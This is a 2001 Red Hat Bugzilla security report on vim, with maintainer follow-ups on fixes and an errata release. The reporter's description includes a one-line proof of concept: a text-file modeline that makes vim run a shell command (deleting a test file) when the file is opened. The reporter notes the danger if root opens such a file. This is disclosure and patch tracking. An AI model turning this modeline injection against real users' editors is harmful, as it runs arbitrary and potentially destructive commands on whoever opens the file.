Bug 25194 - priviledge elevation via simple text file
Summary: priviledge elevation via simple text file
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: vim   
(Show other bugs)
Version: 7.0
Hardware: All Linux
high
medium
Target Milestone: ---
Assignee: Bernhard Rosenkraenzer
QA Contact: David Lawrence
URL:
Whiteboard:
Keywords: Security
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2001-01-29 17:13 UTC by Daniel Roesen
Modified: 2007-03-27 03:39 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2001-03-04 12:48:52 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2001:008 high SHIPPED_LIVE : Updated vim packages available 2001-01-29 05:00:00 UTC

Description Daniel Roesen 2001-01-29 17:13:33 UTC
$ touch testfile
$ echo "vim:ls=2:stl=%{system('rm\ testfile')}" > test.txt
$ vi test.txt 
[leave with :q]
$ ls testfile
ls: testfile: No such file or directory

Think about files opened in vim by root.

restricting viewability to beta team right now. open for public if you
think it is apropriate.

I have stomach ache now :-$

Comment 1 Daniel Roesen 2001-01-29 17:27:33 UTC
This is with vim 6.0-0.12, once build from a Rawhide SRPM.

Comment 2 Bernhard Rosenkraenzer 2001-01-29 22:06:18 UTC
This is fixed in releases >= 0.20.
Looking into older releases now...


Comment 3 Bernhard Rosenkraenzer 2001-01-29 23:24:47 UTC
Fixed package built, waiting for QA approval


Comment 4 Daniel Roesen 2001-03-04 12:48:48 UTC
Hm, no activity since over a month now. Will we see errata update vim for
anymore?

Comment 5 Bernhard Rosenkraenzer 2001-03-22 19:11:53 UTC
Fixed


Note You need to log in before you can comment on or make changes to this bug.